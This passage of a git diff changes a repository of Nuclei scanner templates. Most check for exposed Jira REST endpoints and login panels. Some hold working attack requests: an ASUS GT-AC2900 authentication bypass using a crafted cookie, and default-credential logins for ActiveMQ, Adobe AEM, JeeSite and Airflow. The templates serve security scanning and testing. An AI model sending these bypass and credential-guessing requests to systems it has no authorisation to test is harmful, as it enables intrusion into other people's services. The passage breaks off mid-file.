jira,atlassian,service requests: - method: POST path: diff --git a/poc/atlassian/jira-service-desk-signup-8321.yaml b/poc/atlassian/jira-service-desk-signup-8321.yaml deleted file mode 100644 index 6604106545..0000000000 --- a/poc/atlassian/jira-service-desk-signup-8321.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: jira-service-desk-signup -info: - name: Jira Service Desk Signup - author: TechbrunchFR - severity: medium -requests: - - method: POST - path: - - "{{BaseURL}}/servicedesk/customer/user/signup" - headers: - Content-Type: application/json - body: '{"email":"invalid","signUpContext":{},"secondaryEmail":"","usingNewUi":true}' - matchers-condition: and - matchers: - - type: word - words: - - "signup.validation.errors" - - type: status - status: - - 400 diff --git a/poc/atlassian/jira-unauthenticated-dashboards-8323.yaml b/poc/atlassian/jira-unauthenticated-dashboards-8323.yaml index f31db155cc..8628c41074 100644 --- a/poc/atlassian/jira-unauthenticated-dashboards-8323.yaml +++ b/poc/atlassian/jira-unauthenticated-dashboards-8323.yaml @@ -1,15 +1,21 @@ id: jira-unauthenticated-dashboards + # If public sharing is ON it allows users to share dashboards and filters with all users including -# those that are not logged in. Those dashboard and filters could reveal potentially sensitive information. +# those that are not logged in. Those dashboards and filters could reveal potentially sensitive information. info: name: Jira Unauthenticated Dashboards author: TechbrunchFR severity: info + metadata: + max-request: 1 + shodan-query: http.component:"Atlassian Jira" tags: atlassian,jira -requests: + +http: - method: GET path: - "{{BaseURL}}/rest/api/2/dashboard?maxResults=100" + matchers: - type: word words: @@ -25,3 +31,4 @@ requests: # If you change this setting, you will still need to update the existing filters and dashboards if they have already been # shared publicly. # Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. +# digest: 4a0a0047304502210082b7cb53987cdc653c9a8954733b3456da26355e585b238aa94d81e7938d77f302204de8001df94c11cc650f5ae455212a63c404a066cc29b911fd45686c3bde1a9e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/jira-unauthenticated-dashboards-8324.yaml b/poc/atlassian/jira-unauthenticated-dashboards-8324.yaml index 8628c41074..fbc9736afa 100644 --- a/poc/atlassian/jira-unauthenticated-dashboards-8324.yaml +++ b/poc/atlassian/jira-unauthenticated-dashboards-8324.yaml @@ -1,21 +1,14 @@ id: jira-unauthenticated-dashboards - # If public sharing is ON it allows users to share dashboards and filters with all users including -# those that are not logged in. Those dashboards and filters could reveal potentially sensitive information. +# those that are not logged in. Those dashboard and filters could reveal potentially sensitive information. info: name: Jira Unauthenticated Dashboards author: TechbrunchFR - severity: info - metadata: - max-request: 1 - shodan-query: http.component:"Atlassian Jira" - tags: atlassian,jira - -http: + severity: Info +requests: - method: GET path: - "{{BaseURL}}/rest/api/2/dashboard?maxResults=100" - matchers: - type: word words: @@ -31,4 +24,3 @@ http: # If you change this setting, you will still need to update the existing filters and dashboards if they have already been # shared publicly. # Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. -# digest: 4a0a0047304502210082b7cb53987cdc653c9a8954733b3456da26355e585b238aa94d81e7938d77f302204de8001df94c11cc650f5ae455212a63c404a066cc29b911fd45686c3bde1a9e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/jira-unauthenticated-installed-gadgets-8328.yaml b/poc/atlassian/jira-unauthenticated-installed-gadgets-8328.yaml index 58e5fb36b6..bb38dd61ea 100644 --- a/poc/atlassian/jira-unauthenticated-installed-gadgets-8328.yaml +++ b/poc/atlassian/jira-unauthenticated-installed-gadgets-8328.yaml @@ -1,31 +1,21 @@ id: jira-unauthenticated-installed-gadgets - info: name: Jira Unauthenticated Installed gadgets author: philippedelteil severity: info description: Some Jira instances allow to read the installed gadgets (sometimes it's also possible to read config xml file for some gadgets) - metadata: - max-request: 1 - shodan-query: http.component:"Atlassian Jira" tags: atlassian,jira - -http: +requests: - method: GET path: - "{{BaseURL}}/rest/config/1.0/directory" - - host-redirects: true + redirects: true max-redirects: 2 - matchers-condition: and matchers: - type: word words: - 'jaxbDirectoryContents' - - type: status status: - 200 - -# digest: 4a0a0047304502210099f7859c8f6312ba07f43ba7d80b6ced1937f1ffc2ae555b1ae5d11f1cdc797d02207e68b09ecc7c8f7767224d8b8e07d539a312323747af7ba36059c9c5bdb4a5c9:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/jira-unauthenticated-installed-gadgets-8330.yaml b/poc/atlassian/jira-unauthenticated-installed-gadgets-8330.yaml index da56b71092..58e5fb36b6 100644 --- a/poc/atlassian/jira-unauthenticated-installed-gadgets-8330.yaml +++ b/poc/atlassian/jira-unauthenticated-installed-gadgets-8330.yaml @@ -5,15 +5,19 @@ info: author: philippedelteil severity: info description: Some Jira instances allow to read the installed gadgets (sometimes it's also possible to read config xml file for some gadgets) + metadata: + max-request: 1 + shodan-query: http.component:"Atlassian Jira" tags: atlassian,jira -requests: +http: - method: GET path: - "{{BaseURL}}/rest/config/1.0/directory" - redirects: true + host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -23,3 +27,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a0047304502210099f7859c8f6312ba07f43ba7d80b6ced1937f1ffc2ae555b1ae5d11f1cdc797d02207e68b09ecc7c8f7767224d8b8e07d539a312323747af7ba36059c9c5bdb4a5c9:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/jira-unauthenticated-popular-filters-8331.yaml b/poc/atlassian/jira-unauthenticated-popular-filters-8331.yaml deleted file mode 100644 index 0049e91b4e..0000000000 --- a/poc/atlassian/jira-unauthenticated-popular-filters-8331.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: jira-unauthenticated-popular-filters - -info: - name: Jira Unauthenticated Popular Filters - author: TechbrunchFR - severity: Info - -requests: - - method: GET - path: - - "{{BaseURL}}/secure/ManageFilters.jspa?filter=popular&filterView=popular" - matchers: - - type: word - words: - - 'filterlink_' - -# Remediation: -# Ensure that this permission is restricted to specific groups that require it. -# You can restrict it in Administration > System > Global Permissions. -# Turning the feature off will not affect existing filters and dashboards. -# If you change this setting, you will still need to update the existing filters and dashboards if they have already been -# shared publicly. -# Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. diff --git a/poc/atlassian/jira-unauthenticated-popular-filters.yaml b/poc/atlassian/jira-unauthenticated-popular-filters.yaml index 304d20f9a0..6fbda02ff3 100644 --- a/poc/atlassian/jira-unauthenticated-popular-filters.yaml +++ b/poc/atlassian/jira-unauthenticated-popular-filters.yaml @@ -1,9 +1,8 @@ -id: jira-unauth-popular-filters +id: jira-unauthenticated-popular-filters info: name: Jira Unauthenticated Popular Filters author: TechbrunchFR - severity: info - tags: atlassian,jira + severity: Info requests: - method: GET path: diff --git a/poc/atlassian/jira-unauthenticated-projects-8335.yaml b/poc/atlassian/jira-unauthenticated-projects-8335.yaml deleted file mode 100644 index b23471572b..0000000000 --- a/poc/atlassian/jira-unauthenticated-projects-8335.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: jira-unauthenticated-projects - -info: - name: Jira Unauthenticated Projects - author: TechbrunchFR - severity: info - metadata: - max-request: 1 - shodan-query: http.component:"Atlassian Jira" - tags: atlassian,jira - -http: - - method: GET - path: - - "{{BaseURL}}/rest/api/2/project?maxResults=100" - - matchers: - - type: word - words: - - 'projects' - - 'startAt' - - 'maxResults' - condition: and - -# digest: 4a0a004730450220581d4459c98b3cfe9cc69310f86ad76f7a88cb5c8a633dba698cba5532551df002210099aed0a0def6d0deb8d063f466818d4c08fbbf1fb7576900d783852fb16c3ed5:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/jira-unauthenticated-projects.yaml b/poc/atlassian/jira-unauthenticated-projects.yaml new file mode 100644 index 0000000000..feb60dc794 --- /dev/null +++ b/poc/atlassian/jira-unauthenticated-projects.yaml @@ -0,0 +1,16 @@ +id: jira-unauthenticated-projects +info: + name: Jira Unauthenticated Projects + author: TechbrunchFR + severity: Info +requests: + - method: GET + path: + - "{{BaseURL}}/rest/api/2/project?maxResults=100" + matchers: + - type: word + words: + - 'projects' + - 'startAt' + - 'maxResults' + condition: and diff --git a/poc/atlassian/jira-unauthenticated-screens-8338.yaml b/poc/atlassian/jira-unauthenticated-screens-8338.yaml new file mode 100644 index 0000000000..be696309db --- /dev/null +++ b/poc/atlassian/jira-unauthenticated-screens-8338.yaml @@ -0,0 +1,39 @@ +id: jira-unauthenticated-screens + +info: + name: Jira Unauthenticated Access to screens + author: TESS + severity: info + reference: + - https://developer.atlassian.com/cloud/jira/platform/rest/v2/api-group-screens/#api-rest-api-2-screens-get + metadata: + max-request: 1 + shodan-query: http.component:"Atlassian Jira" + tags: atlassian,jira + +http: + - method: GET + path: + - "{{BaseURL}}/rest/api/2/screens" + + max-size: 1000 + + matchers-condition: and + matchers: + - type: word + words: + - '"id":' + - '"name":' + - '"description":' + condition: and + + - type: status + status: + - 200 + + - type: word + part: header + words: + - "atlassian.xsrf.token" + +# digest: 4b0a00483046022100f47ced43b8419319e9c9ec86664c53d54c3445bffd4b95b2253a39b81856bc20022100e9d254c328d1a1daf297468d1fc6ae202f3e5aa15505af50625e290a019cdfef:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/jira-unauthenticated-screens.yaml b/poc/atlassian/jira-unauthenticated-screens.yaml deleted file mode 100644 index cf71556f27..0000000000 --- a/poc/atlassian/jira-unauthenticated-screens.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: jira-unauthenticated-screens -info: - name: Jira Unauthenticated Access to screens - author: TESS - severity: info - reference: https://developer.atlassian.com/cloud/jira/platform/rest/v2/api-group-screens/#api-rest-api-2-screens-get - tags: atlassian,jira -requests: - - method: GET - path: - - "{{BaseURL}}/rest/api/2/screens" - max-size: 1000 - matchers-condition: and - matchers: - - type: word - words: - - '"id":' - - '"name":' - - '"description":' - condition: and - - type: status - status: - - 200 - - type: word - part: header - words: - - "atlassian.xsrf.token" diff --git a/poc/atlassian/jira_user_piker.yaml b/poc/atlassian/jira-unauthenticated-user-picker.yaml similarity index 100% rename from poc/atlassian/jira_user_piker.yaml rename to poc/atlassian/jira-unauthenticated-user-picker.yaml diff --git a/poc/auth/GT-AC2900-login.yaml b/poc/auth/GT-AC2900-login.yaml index 4ffa4405a7..bb0175987d 100644 --- a/poc/auth/GT-AC2900-login.yaml +++ b/poc/auth/GT-AC2900-login.yaml @@ -1,19 +1,16 @@ id: GT-AC2900-login - info: name: GT-AC2900 登录绕过 author: Str1am severity: critical reference: https://github.com/atredispartners/advisories/blob/master/ATREDIS-2020-0010.md tags: AC2900,ASSUS - requests: - raw: - | GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1 Host: {{Hostname}} Cookie: asus_token=\0Invalid; clickedItem_tab=0 - matchers-condition: and matchers: - type: status @@ -23,4 +20,4 @@ requests: words: - "get_cfg_clientlist" part: body - condition: and \ No newline at end of file + condition: and diff --git a/poc/auth/JeeSite-default-login.yaml b/poc/auth/JeeSite-default-login.yaml index 43ad9321e7..f737242f41 100644 --- a/poc/auth/JeeSite-default-login.yaml +++ b/poc/auth/JeeSite-default-login.yaml @@ -1,9 +1,11 @@ id: JeeSite-default-login + info: name: JeeSite默认密码 author: Str1am severity: high tags: JeeSite,login + requests: - raw: - | @@ -13,6 +15,7 @@ requests: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 username=F3EDC7D2C193E0B8DCF554C726719ED2&password=235880C505ACCDA5C581A4F4CDB81DA0&validCode= + matchers-condition: and matchers: - type: status @@ -22,4 +25,4 @@ requests: words: - "登录成功" part: body - condition: and + condition: and \ No newline at end of file diff --git a/poc/auth/acemanager-login-23.yaml b/poc/auth/acemanager-login-23.yaml new file mode 100644 index 0000000000..65b6f444c9 --- /dev/null +++ b/poc/auth/acemanager-login-23.yaml @@ -0,0 +1,40 @@ +id: acemanager-login + +info: + name: ACEmanager Detection + author: pussycat0x + severity: info + description: ACEManager was detected. ACEManager is a configuration and diagnostic tool for the Sierra Wireless AirLink Raven modems. + metadata: + fofa-dork: 'app="ACEmanager"' + tags: panel,login,tech,acemanager + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '::: ACEmanager :::' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - 'ALEOS Version ([0-9.]+) \| Copyright &co' + +# Enhanced by mp on 2022/03/14 diff --git a/poc/auth/acemanager-login-25.yaml b/poc/auth/acemanager-login-25.yaml index 65b6f444c9..4e352fe09e 100644 --- a/poc/auth/acemanager-login-25.yaml +++ b/poc/auth/acemanager-login-25.yaml @@ -5,14 +5,11 @@ info: author: pussycat0x severity: info description: ACEManager was detected. ACEManager is a configuration and diagnostic tool for the Sierra Wireless AirLink Raven modems. - metadata: - fofa-dork: 'app="ACEmanager"' - tags: panel,login,tech,acemanager classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: cwe-id: CWE-200 + metadata: + fofa-dork: app="ACEmanager" + tags: panel,login,tech,acemanager requests: - method: GET diff --git a/poc/auth/acemanager-login.yaml b/poc/auth/acemanager-login.yaml index c98e3a0c22..cb22a52d84 100644 --- a/poc/auth/acemanager-login.yaml +++ b/poc/auth/acemanager-login.yaml @@ -1,38 +1,32 @@ -id: acemanager-login - -info: - name: ACEmanager Detection - author: pussycat0x - severity: info - description: ACEManager was detected. ACEManager is a configuration and diagnostic tool for the Sierra Wireless AirLink Raven modems. - classification: - cwe-id: CWE-200 - metadata: - max-request: 1 - fofa-query: app="ACEmanager" - tags: panel,login,tech,acemanager - -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '::: ACEmanager :::' - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - regex: - - 'ALEOS Version ([0-9.]+) \| Copyright &co' - -# digest: 4b0a00483046022100db33d084f750421d63d37d1231323fe24b70263a4bc9a3261135dbdb3a2fa40c022100fdc945ef26e812a103dc95df5d4966881be73f3fa68c583c35718a933180263a:922c64590222798bb761d5b6d8e72950 +id: acemanager-login + +info: + name: ACEmanager detect + author: pussycat0x + severity: info + metadata: + fofa-dork: 'app="ACEmanager"' + tags: panel,login,tech,acemanager + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '::: ACEmanager :::' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - 'ALEOS Version ([0-9.]+) \| Copyright &co' diff --git a/poc/auth/activemq-default-login-47.yaml b/poc/auth/activemq-default-login-47.yaml index f58255a1a2..b49e43650c 100644 --- a/poc/auth/activemq-default-login-47.yaml +++ b/poc/auth/activemq-default-login-47.yaml @@ -1,36 +1,18 @@ id: activemq-default-login - info: - name: Apache ActiveMQ Default Login + name: Apache ActiveMQ Default Credentials author: pdteam - severity: high - description: Apache ActiveMQ default login information was discovered. - reference: - - https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html - metadata: - max-request: 2 + severity: medium tags: apache,activemq,default-login - -http: - - raw: - - | - GET /admin/ HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - - payloads: - username: - - user - - admin - password: - - user - - admin - attack: pitchfork +requests: + - method: GET + path: + - '{{BaseURL}}/admin/' + headers: + Authorization: "Basic YWRtaW46YWRtaW4=" matchers: - type: word words: - 'Welcome to the Apache ActiveMQ Console of ' - '

Broker

' condition: and - -# digest: 490a004630440220741c1a7d7e83241b05c9a57b30ecad056f586b75c74f674988e33c74fbb4aad902206da81acaff714d5a42f458eeffa9593486cd2d9dacddf906950315ead2666f50:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/activemq-default-login-44.yaml b/poc/auth/activemq-default-login.yaml similarity index 100% rename from poc/auth/activemq-default-login-44.yaml rename to poc/auth/activemq-default-login.yaml diff --git a/poc/auth/adobe-component-login-89.yaml b/poc/auth/adobe-component-login-89.yaml new file mode 100644 index 0000000000..9b423f9a58 --- /dev/null +++ b/poc/auth/adobe-component-login-89.yaml @@ -0,0 +1,32 @@ +id: adobe-coldfusion-login + +info: + name: Adobe ColdFusion Component Browser Login Panel + author: dhiyaneshDK + description: An Adobe ColdFusion Component Browser login panel was detected. + severity: info + reference: + - https://www.exploit-db.com/ghdb/6846 + tags: panel,adobe,coldfusion + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - '{{BaseURL}}/CFIDE/componentutils/login.cfm' + - '{{BaseURL}}/cfide/componentutils/login.cfm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Component Browser Login' + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/poc/auth/adobe-component-login-90.yaml b/poc/auth/adobe-component-login-90.yaml deleted file mode 100644 index 1d46e94118..0000000000 --- a/poc/auth/adobe-component-login-90.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: adobe-coldfusion-login - -info: - name: Adobe ColdFusion Component Browser Login Panel - author: dhiyaneshDK - severity: info - description: An Adobe ColdFusion Component Browser login panel was detected. - reference: - - https://www.exploit-db.com/ghdb/6846 - classification: - cwe-id: CWE-200 - metadata: - shodan-query: http.component:"Adobe ColdFusion" - tags: panel,adobe,coldfusion - -requests: - - method: GET - path: - - '{{BaseURL}}/CFIDE/componentutils/login.cfm' - - '{{BaseURL}}/cfide/componentutils/login.cfm' - - matchers-condition: and - matchers: - - type: word - words: - - 'Component Browser Login' - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/poc/auth/adobe-connect-central-login-95.yaml b/poc/auth/adobe-connect-central-login-95.yaml deleted file mode 100644 index 9f025cb957..0000000000 --- a/poc/auth/adobe-connect-central-login-95.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: adobe-connect-central-login - -info: - name: Adobe Connect Central Login Panel - author: dhiyaneshDk - severity: info - description: An Adobe Connect Central login panel was detected. - reference: - - https://www.adobe.com/products/adobeconnect.html - classification: - cwe-id: CWE-200 - tags: adobe,panel,connect-central - -requests: - - method: GET - path: - - "{{BaseURL}}/system/login" - - matchers-condition: and - matchers: - - type: word - words: - - 'Adobe Connect Central Login' - part: body - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/poc/auth/adobe-connect-central-login.yaml b/poc/auth/adobe-connect-central-login.yaml index efbb0d1e8f..9f025cb957 100644 --- a/poc/auth/adobe-connect-central-login.yaml +++ b/poc/auth/adobe-connect-central-login.yaml @@ -9,11 +9,9 @@ info: - https://www.adobe.com/products/adobeconnect.html classification: cwe-id: CWE-200 - metadata: - max-request: 1 tags: adobe,panel,connect-central -http: +requests: - method: GET path: - "{{BaseURL}}/system/login" @@ -29,4 +27,4 @@ http: status: - 200 -# digest: 490a00463044022022b5794732a33194d5b4d44da887ecaeb96b05c239c162afcf21c7a7c752e0ac022042c44f3116cfe5a503240785509d78880bb849f0fdfb10e19f37e184b7aaeecc:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/20 diff --git a/poc/auth/adobe-experience-manager-login-105.yaml b/poc/auth/adobe-experience-manager-login-105.yaml new file mode 100644 index 0000000000..4dbdef1e18 --- /dev/null +++ b/poc/auth/adobe-experience-manager-login-105.yaml @@ -0,0 +1,33 @@ +id: adobe-experience-manager-login + +info: + name: Adobe Experience Manager Login Panel + author: dhiyaneshDK + description: An Adobe Experience Manager login panel was detected. + severity: info + reference: + - https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 + - https://business.adobe.com/products/experience-manager/adobe-experience-manager.html + tags: panel,aem,adobe + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - '{{BaseURL}}/libs/granite/core/content/login.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'AEM Sign In' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/poc/auth/adobe-experience-manager-login-106.yaml b/poc/auth/adobe-experience-manager-login-106.yaml deleted file mode 100644 index 2162a6646f..0000000000 --- a/poc/auth/adobe-experience-manager-login-106.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: adobe-experience-manager-login - -info: - name: Adobe-Experience-Manager - author: dhiyaneshDK - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 - tags: panel,aem,adobe - -requests: - - method: GET - path: - - '{{BaseURL}}/libs/granite/core/content/login.html' - - matchers-condition: and - matchers: - - type: word - words: - - 'AEM Sign In' - - - type: status - status: - - 200 diff --git a/poc/auth/adobe-experience-manager-login.yaml b/poc/auth/adobe-experience-manager-login.yaml index 9c41d198e2..2162a6646f 100644 --- a/poc/auth/adobe-experience-manager-login.yaml +++ b/poc/auth/adobe-experience-manager-login.yaml @@ -1,20 +1,13 @@ id: adobe-experience-manager-login info: - name: Adobe Experience Manager Login Panel + name: Adobe-Experience-Manager author: dhiyaneshDK severity: info - description: An Adobe Experience Manager login panel was detected. - reference: - - https://business.adobe.com/products/experience-manager/adobe-experience-manager.html - classification: - cwe-id: CWE-200 - metadata: - max-request: 1 - shodan-query: http.title:"AEM Sign In" + reference: https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 tags: panel,aem,adobe -http: +requests: - method: GET path: - '{{BaseURL}}/libs/granite/core/content/login.html' @@ -28,5 +21,3 @@ http: - type: status status: - 200 - -# digest: 4b0a0048304602210087445f31466e985cdd51946d605a4855acf8185177ea47e0b25cddb5bc30d6b1022100fa9cfd52ea1a651a16f8bcab373286587df6dfd27ff26cc2e3f9960233384744:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/aem-default-login-140.yaml b/poc/auth/aem-default-login-140.yaml new file mode 100644 index 0000000000..8072025a73 --- /dev/null +++ b/poc/auth/aem-default-login-140.yaml @@ -0,0 +1,56 @@ +id: aem-default-login + +info: + name: Adobe AEM Default Login + author: random-robbie + severity: high + description: Adobe AEM default login credentials were discovered. + reference: + - https://experienceleague.adobe.com/docs/experience-manager-64/administering/security/security-checklist.html?lang=en + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: aem,default-login,adobe + + +requests: + - raw: + - | + POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Origin: {{BaseURL}} + Referer: {{BaseURL}}/libs/granite/core/content/login.html + + _charset_=utf-8&j_username={{aem_user}}&j_password={{aem_pass}}&j_validate=true + + attack: pitchfork + payloads: + aem_user: + - admin + - grios + - replication-receiver + - vgnadmin + + aem_pass: + - admin + - password + - replication-receiver + - vgnadmin + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + condition: and + words: + - login-token + - crx.default + +# Enhanced by mp on 2022/03/23 diff --git a/poc/auth/aem-default-login-142.yaml b/poc/auth/aem-default-login-142.yaml index 8072025a73..30c718c891 100644 --- a/poc/auth/aem-default-login-142.yaml +++ b/poc/auth/aem-default-login-142.yaml @@ -11,10 +11,12 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + metadata: + max-request: 8 + shodan-query: http.component:"Adobe Experience Manager" tags: aem,default-login,adobe - -requests: +http: - raw: - | POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 @@ -32,14 +34,21 @@ requests: - grios - replication-receiver - vgnadmin - + - author + - anonymous + - jdoe@geometrixx.info + - aparker@geometrixx.info aem_pass: - admin - password - replication-receiver - vgnadmin - + - author + - anonymous + - jdoe + - aparker stop-at-first-match: true + matchers-condition: and matchers: - type: status @@ -48,9 +57,9 @@ requests: - type: word part: header - condition: and words: - login-token - crx.default + condition: and -# Enhanced by mp on 2022/03/23 +# digest: 4a0a004730450220222a3b892a7451300a85043c153a1fbe5d336d8c9f30c474065214bbac5906bc022100981335810687d458df2fb4ca0c7698ec9597777f599956f12f0a62b18f285727:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/aem-login-status-170.yaml b/poc/auth/aem-login-status-170.yaml new file mode 100644 index 0000000000..d8446f7869 --- /dev/null +++ b/poc/auth/aem-login-status-170.yaml @@ -0,0 +1,24 @@ +id: aem-login-status + +info: + author: DhiyaneshDk + name: AEM Login Status + severity: info + reference: https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212 + tags: aem + + +requests: + - method: GET + path: + - '{{BaseURL}}/system/sling/loginstatus.css' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'CREDENTIAL_CHALLENGE' + condition: and diff --git a/poc/auth/aem-login-status-171.yaml b/poc/auth/aem-login-status.yaml similarity index 100% rename from poc/auth/aem-login-status-171.yaml rename to poc/auth/aem-login-status.yaml diff --git a/poc/auth/aims-password-mgmt-client-218.yaml b/poc/auth/aims-password-mgmt-client-218.yaml new file mode 100644 index 0000000000..c6f768a5c9 --- /dev/null +++ b/poc/auth/aims-password-mgmt-client-218.yaml @@ -0,0 +1,27 @@ +id: aims-password-mgmt-client + +info: + name: Aims Password Management Client Detect + author: iamthefrogy + description: An Aims Password management client was detected. + severity: info + tags: panel,aims + reference: + - https://www.avatier.com/products/identity-management/password-management/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - "{{BaseURL}}/aims/ps/" + + matchers: + - type: word + words: + - "Avatier Corporation" + +# Enhanced by mp on 2022/03/21 diff --git a/poc/auth/aims-password-mgmt-client-219.yaml b/poc/auth/aims-password-mgmt-client-219.yaml new file mode 100644 index 0000000000..a178296f3f --- /dev/null +++ b/poc/auth/aims-password-mgmt-client-219.yaml @@ -0,0 +1,17 @@ +id: aims-password-mgmt-client + +info: + name: Aims Password Management Client Detect + author: iamthefrogy + severity: info + tags: panel,aims + +requests: + - method: GET + path: + - "{{BaseURL}}/aims/ps/" + + matchers: + - type: word + words: + - "Avatier Corporation" diff --git a/poc/auth/aims-password-mgmt-client-221.yaml b/poc/auth/aims-password-mgmt-client-221.yaml deleted file mode 100644 index 76998f88a1..0000000000 --- a/poc/auth/aims-password-mgmt-client-221.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: aims-password-mgmt-client - -info: - name: Aims Password Management Client Detect - author: iamthefrogy - severity: info - tags: panel - -requests: - - method: GET - path: - - "{{BaseURL}}/aims/ps/" - - matchers: - - type: word - words: - - "Avatier Corporation" diff --git a/poc/auth/aims-password-mgmt-client.yaml b/poc/auth/aims-password-mgmt-client.yaml index a178296f3f..76998f88a1 100644 --- a/poc/auth/aims-password-mgmt-client.yaml +++ b/poc/auth/aims-password-mgmt-client.yaml @@ -4,7 +4,7 @@ info: name: Aims Password Management Client Detect author: iamthefrogy severity: info - tags: panel,aims + tags: panel requests: - method: GET diff --git a/poc/auth/aims-password-portal-222.yaml b/poc/auth/aims-password-portal-222.yaml deleted file mode 100644 index 62ffc3aebf..0000000000 --- a/poc/auth/aims-password-portal-222.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: aims-password-portal - -info: - name: AIMS Password Management Portal - author: dhiyaneshDK - severity: info - description: An AIMS Password Management portal was discovered. - reference: - - https://www.exploit-db.com/ghdb/6576 - - https://www.avatier.com/products/identity-management/password-management/ - tags: panel,aims - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - '{{BaseURL}}/aims/ps/default.aspx' - - matchers-condition: and - matchers: - - type: word - words: - - 'Password Management Client' - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/21 diff --git a/poc/auth/aims-password-portal-224.yaml b/poc/auth/aims-password-portal-224.yaml index eb21d8e0eb..62ffc3aebf 100644 --- a/poc/auth/aims-password-portal-224.yaml +++ b/poc/auth/aims-password-portal-224.yaml @@ -4,8 +4,16 @@ info: name: AIMS Password Management Portal author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/6576 - tags: panel + description: An AIMS Password Management portal was discovered. + reference: + - https://www.exploit-db.com/ghdb/6576 + - https://www.avatier.com/products/identity-management/password-management/ + tags: panel,aims + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET @@ -20,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/21 diff --git a/poc/auth/airflow-default-login-236.yaml b/poc/auth/airflow-default-login-236.yaml index cef2568e5d..772e1ffd78 100644 --- a/poc/auth/airflow-default-login-236.yaml +++ b/poc/auth/airflow-default-login-236.yaml @@ -1,18 +1,27 @@ id: airflow-default-login + info: name: Apache Airflow Default Login author: pdteam - severity: critical - tags: airflow,default-login,apache - reference: https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html + severity: high + description: An Apache Airflow default login was discovered. + reference: + - https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html + classification: + cvss-metrics: 